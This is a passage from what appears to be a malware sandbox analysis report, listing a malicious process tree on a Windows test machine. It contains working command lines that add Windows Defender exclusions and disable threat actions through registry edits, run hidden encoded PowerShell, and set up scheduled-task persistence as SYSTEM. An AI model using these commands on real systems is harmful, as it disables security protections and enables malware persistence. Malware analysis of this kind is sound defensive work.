                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GWamqZVWU" /t REG_DWORD /d 0 /reg:32
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:7700
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GWamqZVWU" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:5748
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QEWXpPeaXUxnC" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:6832
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QEWXpPeaXUxnC" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:7112
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WfxNQjjWZmUn" /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:6328
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WfxNQjjWZmUn" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:6224
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qCkphlJEjzXU2" /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:5560
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qCkphlJEjzXU2" /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5904
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR" /t REG_DWORD /d 0 /reg:32
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:6240
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR" /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:4704
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\waPdBDBOzCnVwFVB /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:5504
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\waPdBDBOzCnVwFVB /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:5764
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:6604
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:6312
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SzOsjPJAGPNEYYQWc /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:4820
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SzOsjPJAGPNEYYQWc /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:6448
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kvKwEgGmKkXJvFrr /t REG_DWORD /d 0 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:6020
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kvKwEgGmKkXJvFrr /t REG_DWORD /d 0 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:7408
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /CREATE /TN "gfEChxAqC" /SC once /ST 03:01:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                            2⤵
                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                            PID:7516
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /run /I /tn "gfEChxAqC"
                                                                                                                            2⤵
                                                                                                                              PID:7628
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /DELETE /F /TN "gfEChxAqC"
                                                                                                                              2⤵
                                                                                                                                PID:5412
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /CREATE /TN "CXcXrFnFggmBuldeR" /SC once /ST 04:44:03 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kvKwEgGmKkXJvFrr\rZMTnhYjhyLmNuX\TYuGwkM.exe\" Fz /CyOEdidfx 385107 /S" /V1 /F
                                                                                                                                2⤵
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:6140
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /run /I /tn "CXcXrFnFggmBuldeR"
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:8068
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 808
                                                                                                                                2⤵
                                                                                                                                • Program crash
                                                                                                                                PID:4904
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                              1⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:5284
                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                2⤵
                                                                                                                                  PID:6556
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                1⤵
                                                                                                                                  PID:7352
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                  1⤵
                                                                                                                                    PID:7360
                                                                                                                                  • \??\c:\windows\system32\gpscript.exe
                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                    1⤵
                                                                                                                                      PID:7900
                                                                                                                                    • C:\Windows\Temp\kvKwEgGmKkXJvFrr\rZMTnhYjhyLmNuX\TYuGwkM.exe
                                                                                                                                      C:\Windows\Temp\kvKwEgGmKkXJvFrr\rZMTnhYjhyLmNuX\TYuGwkM.exe Fz /CyOEdidfx 385107 /S
                                                                                                                                      1⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops Chrome extension
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:8096
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                        2⤵
                                                                                                                                          PID:7844
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                            3⤵
                                                                                                                                            • Indirect Command Execution
                                                                                                                                            PID:8024
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                              4⤵
                                                                                                                                                PID:1688
                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5228
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                3⤵
                                                                                                                                                • Indirect Command Execution
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5664
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                  4⤵
                                                                                                                                                    PID:6720
                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                      5⤵
                                                                                                                                                        PID:7044
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                    3⤵
                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:6908
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                      4⤵
                                                                                                                                                        PID:6668
                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                          5⤵
                                                                                                                                                            PID:6780
                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                        3⤵
                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:6860
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5844
                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                              5⤵
                                                                                                                                                                PID:5988
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                            3⤵
                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5368
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                              4⤵
                                                                                                                                                                PID:6560
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  PID:7056
                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4648
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /DELETE /F /TN "bAURefglkfXMIGMYVR"
                                                                                                                                                              2⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:6132
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                              2⤵
                                                                                                                                                                PID:6100
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:4376
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:6776
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                        PID:1040
                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:5900
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\GWamqZVWU\VQUmpf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "YPIUkAhXIxAocLu" /V1 /F
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:7372
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /CREATE /TN "YPIUkAhXIxAocLu2" /F /xml "C:\Program Files (x86)\GWamqZVWU\iHxKQCh.xml" /RU "SYSTEM"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:5684
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /END /TN "YPIUkAhXIxAocLu"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:7116
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /DELETE /F /TN "YPIUkAhXIxAocLu"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5656
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "vmRiSjUYMxyipE" /F /xml "C:\Program Files (x86)\qCkphlJEjzXU2\wJwTSgu.xml" /RU "SYSTEM"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:7304
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "JkNkKYYKQHkJa2" /F /xml "C:\ProgramData\waPdBDBOzCnVwFVB\VwaacaL.xml" /RU "SYSTEM"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:7404
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "wnrjDODVDojlYZAQV2" /F /xml "C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR\ytMWjOY.xml" /RU "SYSTEM"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:7952
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "GHPyaplqcKioSqURUFk2" /F /xml "C:\Program Files (x86)\QEWXpPeaXUxnC\AiUExvE.xml" /RU "SYSTEM"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:8152
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "dfuJCXiChfCXHQVcD" /SC once /ST 04:34:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\kvKwEgGmKkXJvFrr\tCgNBqpx\FgYpWIT.dll\",#1 /vjsdidbt 385107" /V1 /F
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:5376
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /run /I /tn "dfuJCXiChfCXHQVcD"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:5828
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /DELETE /F /TN "CXcXrFnFggmBuldeR"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:6436
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1988
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:7400
                                                                                                                                                                      • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                        c:\windows\system32\rundll32.EXE "C:\Windows\Temp\kvKwEgGmKkXJvFrr\tCgNBqpx\FgYpWIT.dll",#1 /vjsdidbt 385107
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:7208
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            c:\windows\system32\rundll32.EXE "C:\Windows\Temp\kvKwEgGmKkXJvFrr\tCgNBqpx\FgYpWIT.dll",#1 /vjsdidbt 385107
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            PID:7324
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /DELETE /F /TN "dfuJCXiChfCXHQVcD"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1656
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:5804
                                                                                                                                                                          • C:\Users\Admin\Pictures\Lighter Tech\runtime.exe
                                                                                                                                                                            "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe"
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:6372
                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5608
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4496
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:5520
                                                                                                                                                                              • C:\Users\Admin\Pictures\Lighter Tech\runtime.exe
                                                                                                                                                                                "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe"
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:6656
                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:6192
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:6620
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    PID:5960
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Lighter Tech\runtime.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:2556
                                                                                                                                                                                  • \??\c:\windows\system32\wscript.EXE
                                                                                                                                                                                    c:\windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:7004
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.scr
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\Admin\AppData\Local\TrackGuard Technologies\z"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:2536
                                                                                                                                                                                    • \??\c:\windows\system32\wscript.EXE
                                                                                                                                                                                      c:\windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:7396
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.pif
